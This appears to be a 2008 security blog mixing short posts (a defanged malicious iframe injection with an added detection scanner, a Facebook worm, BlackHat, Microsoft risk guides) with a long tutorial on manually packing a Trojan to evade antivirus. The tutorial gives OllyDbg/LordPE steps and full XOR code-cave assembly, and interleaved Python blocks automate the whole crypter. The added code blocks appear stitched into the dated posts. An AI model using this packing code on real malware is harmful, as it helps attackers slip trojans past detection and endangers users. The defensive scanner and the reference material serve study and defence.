Monday, August 11, 2008
RBN?
Today I came across a hacked web site containing some JavaScript files pointing to a static IP. The content of the web page hosted by the infected PCs is an iframe from 91.203.93.4, inserted via JavaScript like this (defanged):
document.write "-i-frame sr-c=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 iframe " ;
You can read more about it on:
http://www.matchent.com/wpress/index.php?q=comment/reply/365
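As an added example (not part of the original post), here is a small scanner for the injection pattern described above: a document.write() call that emits an iframe with a zero width or height whose src points at a bare IP address. The JavaScript lines it is run over are constructed for the example; only the IP 91.203.93.4 is taken from the post, the path, the benign second iframe and the hostname www.example.com are assumptions. It only catches the literal form (one quoted string handed to document.write); code that builds the string by concatenation or unescape() would need a different approach.

```python
import re
import ipaddress

# document.write('<...>') with a single- or double-quoted literal argument.
# Limitation: an escaped quote of the same kind inside the literal ends the match early.
DOC_WRITE_RE = re.compile(r"""document\.write\s*\(\s*(['"])(.*?)\1\s*\)""",
                          re.IGNORECASE | re.DOTALL)
IFRAME_RE = re.compile(r"<\s*iframe\b([^>]*)>", re.IGNORECASE)          # opening tags only
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?\s*(\d+)""", re.IGNORECASE)

# Constructed sample, not taken from the compromised site: the first call mirrors the
# injection pattern from the post (0x0 iframe, src on a bare IP), the second is a benign embed.
SAMPLE_JS = """
var ad = 1;
document.write('<iframe src="http://91.203.93.4/cgi-bin/index.cgi?ad" width=0 height=0 frameborder=0></iframe>');
document.write('<iframe src="https://www.example.com/widget" width="300" height="250"></iframe>');
"""


def host_is_ip_literal(host):
    """True when the host part of a URL is a numeric IP (port, if any, is ignored)."""
    host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_iframe(attrs):
    """Indicators for one <iframe ...> attribute string: target host, IP literal, hidden size."""
    m = SRC_RE.search(attrs)
    host = m.group(1) if m else None
    dims = {k.lower(): int(v) for k, v in DIM_RE.findall(attrs)}
    hidden = dims.get("width") == 0 or dims.get("height") == 0
    return {"host": host, "ip_literal": bool(host and host_is_ip_literal(host)), "hidden": hidden}


def scan_js(source):
    """Find document.write() calls that inject iframes and flag hidden frames on bare IPs."""
    findings = []
    for call in DOC_WRITE_RE.finditer(source):
        for frame in IFRAME_RE.finditer(call.group(2)):
            info = analyze_iframe(frame.group(1))
            info["suspicious"] = info["hidden"] and info["ip_literal"]
            findings.append(info)
    return findings


if __name__ == "__main__":
    for finding in scan_js(SAMPLE_JS):
        print(finding)
```

Run it over the .js files of a site you suspect; a hit with "suspicious": True is a hidden frame pulling content from a raw IP, which is exactly the shape of the injection above. A legitimate embed with visible dimensions on a hostname, like the second sample line, is reported but not flagged.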
Thursday, August 7, 2008
The FaceBook virus / worm
Today I saw 2 strange messages from my Facebook friends.
- Both of them were the same, and I remember that I saw an article today about a Facebook virus/worm.
- The link directed me to the code in the image, which linked to the download of a worm.
Wednesday, July 2, 2008
BlackHat USA 2008
Coming soon, August 2-7, Las Vegas, USA
"The Black Hat Briefings return to the venerable Caesars Palace Hotel and Casino for another installment of the premier North American technical information security conference.
Every year the lineup of presentations helps define the security headlines for the following year, and 2008 will be no exception."
Last year, as published on this blog before, I met some great Israeli security researchers at the conference, from whom I was more than proud to learn and with whom I shared knowledge.
One of them was Aviv Raff, who also lectured at the Defcon summit, will probably be there this year, and will hopefully share some of his thoughts "live".
This year we will also be honored to get notes, remarks and an overall description from another security specialist, Jacky Altal.
Monday, June 30, 2008
EXE PACKING – The Hard Way
By Jacky Altal 
Manually packing an application is an important procedure, and one that can be done easily. There are many reasons to pack an executable, for example to protect it from modification of its functionality or from other tampering. Attackers use the same method to hide malicious code inside applications.
Another use of manual packing is to bypass anti-virus software: a signature that matches bytes of the malicious code no longer matches once those bytes are stored encrypted on disk.
First, the section holding the code to protect (the .text section, or the .data and .rsrc sections as well) needs to be encrypted. Alternatively, if the location of the virus signature is known, only those specific bytes need encrypting. The decryption routine itself is stored unencrypted in a code cave. A small XOR routine has to be written; it is run once to encrypt the code, and the result is saved to a file.
When the encrypted file is executed, the XOR routine runs first. This time it decrypts the code back to its original state in memory, and the program runs as before, while the bytes on disk no longer match what a signature scanner is looking for.
What is the XOR function?
XOR, also known as Exclusive OR, is a bitwise operator from binary mathematics. The XOR operator returns 1 when exactly one of the two input bits is 1, and 0 when neither or both of the bits is 1.
This is best illustrated in the following chart:
First bit  Second bit  Result
    0          0         0
    0          1         1
    1          0         1
    1          1         0
The XOR operator is used to "flip" bits (zeros and ones) in a piece of plaintext to create a ciphertext. Because XORing a bit twice with the same key bit gives back the original bit, a code section that is XORed twice with the same key returns to its original state; the same routine therefore serves as both encryptor and decryptor.
Entry Point  <---
             jump to encrypt/cave code
Code Cave  <---
             XOR function encrypt/decrypt
End Cave    <---
Overwrite the first instruction at the entry point with a JMP to the crypto routine, place the crypto routine in the code cave, follow it with the instruction that the JMP overwrote, and end with a JMP back to the first original instruction after the overwritten one, so execution continues exactly as it did before the hook.
The crypto routine is run once (under the debugger) to encrypt the whole section, and the result is saved to a file. The next time the file is run, the same routine decrypts the code section back to its original state before it executes.
Tools
Infected exe (Trojan)
Ollydbg 
LordPE
Hands On
Open up your infected file in OllyDbg and back up the first few instructions at the entry point: mark the first few lines, right-click, choose Copy to clipboard, and paste them into a text file. You will need the overwritten instruction later.
-=:Entry Code:=-
00401219 >/$ 64:A1 00000000   MOV EAX,DWORD PTR FS:[0]
0040121F  |. 55               PUSH EBP
00401220  |. 89E5             MOV EBP,ESP
00401222  |. 6A FF            PUSH -1
Go to the end of the file and look for a run of DB 00 bytes: that is the code cave. First try to assemble into that area. If the section is writeable you are set and do not need to change the section permissions.
-=:Cave Code:=-
0040E4FD   0000   ADD BYTE PTR DS:[EAX],AL
0040E4FF   0000   ADD BYTE PTR DS:[EAX],AL
0040E501   0000   ADD BYTE PTR DS:[EAX],AL
0040E503   0000   ADD BYTE PTR DS:[EAX],AL
If you receive an error message, the area is protected and the PE section header must be modified so the area can be written. Whatever the debugger lets you do, keep in mind what happens at run time, outside the debugger: the XOR loop writes into the section itself, and Windows maps a section without the Writeable flag read-only, so the first XOR would raise an access violation. The section that gets encrypted must therefore be marked writeable, and the section holding the cave must be executable. Both changes are easily made with LordPE (edit the section properties).
 
Open up LordPE, load your file and click the Sections button. Right-click the section that holds the bytes you are going to encrypt (and, if it is a different one, the section holding the cave) and open its properties window. Tick the checkboxes to make the section writeable and executable, then save. The file is ready for patching.
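The LordPE step done programmatically, as an added example that is not part of the original article: walk the PE section table, find the section whose mapped range contains the bytes to be encrypted, and set the Writeable and Executable flags (IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE) in its header. The PE it works on is a minimal PE32 constructed inline for the example, laid out to match the article's addresses (image base 0x400000, .text at RVA 0x1000 with the entry point at RVA 0x1219, mapped read+execute only); the header field offsets are those of the PE/COFF format.

```python
import struct

# IMAGE_SECTION_HEADER.Characteristics bits used here
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # 40-byte IMAGE_SECTION_HEADER


def build_sample_pe32():
    """Constructed minimal PE32 with one .text section, laid out like the article's target."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)   # i386, 1 section
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 0, 0, 0xD600, 0, 0, 0x1219, 0x1000, 0,       # PE32, entry RVA 0x1219
                      0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,          # image base, alignments
                      0, 0xF000, 0x200, 0, 2, 0,                          # SizeOfImage, SizeOfHeaders
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128  # 16 empty data dirs
    text = SECTION_HDR.pack(b".text", 0xD600, 0x1000, 0xD600, 0x200, 0, 0, 0, 0,
                            IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    headers = dos + b"PE\0\0" + file_hdr + opt + text
    return bytearray(headers.ljust(0x200, b"\0") + b"\0" * 0xD600)        # raw .text is all zeros


def parse_pe(pe):
    """Read the header fields this task needs plus every section header."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                    # IMAGE_OPTIONAL_HEADER
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + i * SECTION_HDR.size
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(pe, off)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": rawsize, "raw_ptr": rawptr, "chars": chars, "hdr_off": off})
    return {"image_base": image_base, "entry_va": image_base + entry_rva, "sections": sections}


def section_for_range(info, va_lo, va_hi):
    """The section whose mapped bytes contain the closed range [va_lo, va_hi], or None."""
    for s in info["sections"]:
        start = info["image_base"] + s["va"]
        end = start + max(s["vsize"], s["raw_size"])
        if start <= va_lo and va_hi < end:
            return s
    return None


def va_to_file_offset(info, va):
    """Where a virtual address lives in the file on disk, or None if it is not backed by raw data."""
    rva = va - info["image_base"]
    for s in info["sections"]:
        if s["va"] <= rva < s["va"] + s["raw_size"]:
            return s["raw_ptr"] + (rva - s["va"])
    return None


def make_writable_executable(pe, section):
    """The LordPE step: set Writeable and Executable on one section header, in place."""
    new = section["chars"] | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    struct.pack_into("<I", pe, section["hdr_off"] + 36, new)   # Characteristics is at +36
    section["chars"] = new
    return new


if __name__ == "__main__":
    pe = build_sample_pe32()
    info = parse_pe(pe)
    sec = section_for_range(info, 0x40129C, 0x40E46C)
    print("entry point  : %08X" % info["entry_va"])
    print("section      : %s  chars=%08X" % (sec["name"], sec["chars"]))
    print("0040129C on disk at file offset %#x" % va_to_file_offset(info, 0x40129C))
    print("after patch  : chars=%08X" % make_writable_executable(pe, sec))
```

va_to_file_offset is the mapping LordPE and OllyDbg hide from you: the bytes shown at 0040129C sit at file offset 0x49C in this sample, and that is the offset a file-level patcher has to write to. The flag change is applied to the header bytes in the buffer, so writing the buffer back to disk is all that remains.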
The following routine XORs the target section. It is a simple encryption loop: starting at 0040129C it XORs every byte with our key (0F), increments the pointer, and stops after the last byte of the section (0040E46C, inclusive, because the loop continues while EAX <= 0040E46C). JLE is a signed comparison, which is fine for user-mode addresses below 80000000.
Encryption Routine
mov eax,0040129C        ; first byte of the range
xor_loop:
xor byte [eax],0F       ; flip the byte with the key
inc eax
cmp eax,0040E46C        ; last byte of the range
jle xor_loop            ; keep going while eax <= end
Overwritten entry instruction (re-executed in the cave)
00401219 >/$ 64:A1 00000000   MOV EAX,DWORD PTR FS:[0]
The PUSH EBP at 0040121F is left intact; it is where the cave code jumps back to.
Patched entry point (jump to the cave)
00401219 >   E9 E2D20000   JMP finish1t.0040E500
0040121E     90            NOP
The original instruction was 6 bytes long; the 5-byte JMP plus one NOP fill exactly the same space, so the following instruction still starts at 0040121F.
 
The final code should look like the following:
XOR loop + overwritten entry instruction + jump back to the application flow.
Code Cave:
0040E500   B8 9C124000      MOV EAX,finish1t.0040129C      ; first byte of the encrypted range
0040E505   8030 0F          XOR BYTE PTR DS:[EAX],0F
0040E508   40               INC EAX
0040E509   3D 6CE44000      CMP EAX,0040E46C               ; last byte of the range
0040E50E   7E F5            JLE SHORT finish1t.0040E505
0040E510   64:A1 00000000   MOV EAX,DWORD PTR FS:[0]       ; the instruction overwritten at the entry point
0040E516   E9 042DFFFF      JMP finish1t.0040121F          ; back to PUSH EBP
Now put a breakpoint at the end of the loop, at 0040E510, and run the code. When execution stops there, the whole range has been XORed once in memory. Save the modified code back to the executable (right-click, Copy to executable, All modifications) and save the file, then exit OllyDbg.
Last but not least, double-check that the entry point really jumps to the cave:
00401219 >   E9 E2D20000   JMP finish1t.0040E500
A scanner that looked for its signature inside the encrypted range no longer matches the file. The file is ready.
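The whole patch in code, as an added example that is not the author's: from the addresses used in the article it assembles the cave stub and the entry-point JMP byte for byte (computing the rel8 and rel32 displacements that OllyDbg worked out for the author), applies the one-time XOR pass over a flat copy of the section, and shows that a second pass restores the original. The image buffer is a constructed stand-in for the loaded section (flat bytes from 0x401000, filler up to 0040E46C, zeros after it for the cave) rather than a real PE; the constants and opcode encodings are those of the listing above.

```python
import struct

# Addresses from the article's listing (image base 0x400000, entry point 0x401219).
BASE        = 0x00401000  # start of the flat image buffer below (stand-in for the section)
ENTRY       = 0x00401219  # original entry point: MOV EAX,DWORD PTR FS:[0], 6 bytes
RESUME      = 0x0040121F  # first instruction left intact (PUSH EBP); the cave jumps back here
XOR_START   = 0x0040129C  # first byte to encrypt
XOR_END     = 0x0040E46C  # last byte to encrypt, inclusive (the loop runs while EAX <= XOR_END)
CAVE        = 0x0040E500  # zero-filled code cave that receives the stub
KEY         = 0x0F
OVERWRITTEN = bytes.fromhex("64A100000000")  # the entry instruction the JMP replaces


def rel32(src, dst):
    """Displacement for a 5-byte E9 JMP rel32 located at src and landing on dst."""
    return struct.pack("<i", dst - (src + 5))


def rel8(src, dst):
    """Displacement for a 2-byte Jcc rel8 located at src and landing on dst."""
    disp = dst - (src + 2)
    if not -128 <= disp <= 127:
        raise ValueError("target out of rel8 range")
    return struct.pack("<b", disp)


def build_stub(cave, start, end, key, resume, overwritten):
    """Cave contents: XOR loop, the overwritten entry instruction, JMP back to the program."""
    code = bytearray()
    code += b"\xB8" + struct.pack("<I", start)            # MOV EAX, start
    loop = cave + len(code)
    code += b"\x80\x30" + bytes([key])                     # XOR BYTE PTR [EAX], key
    code += b"\x40"                                        # INC EAX
    code += b"\x3D" + struct.pack("<I", end)               # CMP EAX, end
    code += b"\x7E" + rel8(cave + len(code), loop)         # JLE SHORT loop (signed; fine below 0x80000000)
    code += overwritten                                    # re-execute what the entry JMP displaced
    code += b"\xE9" + rel32(cave + len(code), resume)      # JMP resume
    return bytes(code)


def build_entry_patch(entry, cave, overwritten_len):
    """JMP cave at the entry point, NOP-padded to the length of the displaced instruction."""
    patch = b"\xE9" + rel32(entry, cave)
    if overwritten_len < len(patch):
        raise ValueError("need at least 5 bytes at the entry point")
    return patch + b"\x90" * (overwritten_len - len(patch))


def xor_range(image, base, start, end, key):
    """What the loop does at run time: XOR every byte of the closed range [start, end] in place."""
    for va in range(start, end + 1):
        image[va - base] ^= key


def make_sample_image():
    """Constructed flat copy of the section: non-zero filler up to XOR_END, zeros (the cave) after."""
    image = bytearray(0xD600)                              # covers BASE .. 0x40E600
    for i in range(XOR_END - BASE + 1):
        image[i] = (i * 7 + 3) & 0xFF                      # arbitrary filler standing in for code
    image[ENTRY - BASE:ENTRY - BASE + len(OVERWRITTEN)] = OVERWRITTEN
    image[RESUME - BASE] = 0x55                            # PUSH EBP
    return image


def apply_crypter(image, base=BASE):
    """Do in one pass what the article does by hand in OllyDbg; returns the stub bytes."""
    stub = build_stub(CAVE, XOR_START, XOR_END, KEY, RESUME, OVERWRITTEN)

    def overlaps(lo, hi):                                  # closed range vs [XOR_START, XOR_END]
        return lo <= XOR_END and hi >= XOR_START

    if overlaps(CAVE, CAVE + len(stub) - 1) or overlaps(ENTRY, ENTRY + len(OVERWRITTEN) - 1):
        raise ValueError("stub and entry patch must lie outside the encrypted range")
    cave_off = CAVE - base
    if any(image[cave_off:cave_off + len(stub)]):
        raise ValueError("cave is not empty")
    image[cave_off:cave_off + len(stub)] = stub
    ep = ENTRY - base
    image[ep:ep + len(OVERWRITTEN)] = build_entry_patch(ENTRY, CAVE, len(OVERWRITTEN))
    xor_range(image, base, XOR_START, XOR_END, KEY)       # the one-time encryption pass
    return stub


if __name__ == "__main__":
    img = make_sample_image()
    stub = apply_crypter(img)
    print("cave stub :", stub.hex().upper())
    print("entry     :", img[ENTRY - BASE:ENTRY - BASE + 6].hex().upper())
```

Two details the flat model makes visible: the stub clobbers EAX and the flags, which is safe only because the displaced entry instruction is itself a MOV into EAX and nothing at the entry depends on flags; and the stub and the entry patch must lie outside the encrypted range, otherwise the decryptor would scramble itself or its own return path. What the model leaves out is what the debugger handles for the author: the section flags (the LordPE step) and writing the modified memory back to the file. If the encrypted range included data the loader rewrites at load time, such as the import address table, saving the in-memory copy would also bake those load-time changes into the file.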
Friday, February 29, 2008
Thursday, February 14, 2008
The Threats and Countermeasures Guide

Brief Description
Security Settings in Windows Server 2003 and Windows XP
The Threats and Countermeasures guide provides a reference to all the security settings that act as countermeasures against specific threats to current versions of the Microsoft® Windows® operating systems.
Download the guide here
This guide is a companion for two other publications that are available from Microsoft:
• Windows Server 2003 Security Guide, available online at
http://go.microsoft.com/fwlink/?LinkId=14845
 
• Windows XP Security Guide, available online at
http://go.microsoft.com/fwlink/?LinkId=14839
Additional useful information for assessing risk

Asset Classes
For additional information on defining and categorizing information and information systems, refer to National Institute of Standards and Technology (NIST) Special Publication 800-60 workshops, "Mapping Types of Information and Information Systems to Security Categories," and the Federal Information Processing Standards (FIPS) publication 199, "Security Categorization of Federal Information and Information Systems."
For "Common Information System Assets":
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappb.mspx
For "Common Threats":
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappc.mspx
For examples of "Vulnerabilities":
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappd.mspx
More info on Security Risk Management

"Microsoft’s approach to risk management and assessment isn’t the only one available to organizations. Some other popular approaches include:
    * Risk Management Guide for Information Technology Systems and Security Self-Assessment Guide for Information Technology Systems, both developed by the National Institute of Standards and Technology (NIST)
http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf
http://csrc.nist.gov/publications/nistpubs/800-26/sp800-26.pdf
    * Information technology — Code of practice for information security management (ISO 17799), available from the International Standards Organization (ISO).
http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=33441&ICS1=35&ICS2=40&ICS3=
    * Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) from Computer Emergency Response Team (CERT) at the Software Engineering Institute at Carnegie-Mellon University.
http://www.cert.org/octave
These resources are also useful in helping you plan and implement an effective risk management solution for your company. But in my opinion, Microsoft’s approach is simple and easy to implement, and is a good starting point, especially for IT shops that are strong on Microsoft platforms. For although the Guide is described by Microsoft as being cross-platform and vendor-neutral in its approach, its prescriptive control solutions target Microsoft products in particular. That doesn’t surprise me however, and in no way reduces the usefulness of this excellent Guide."
Read source...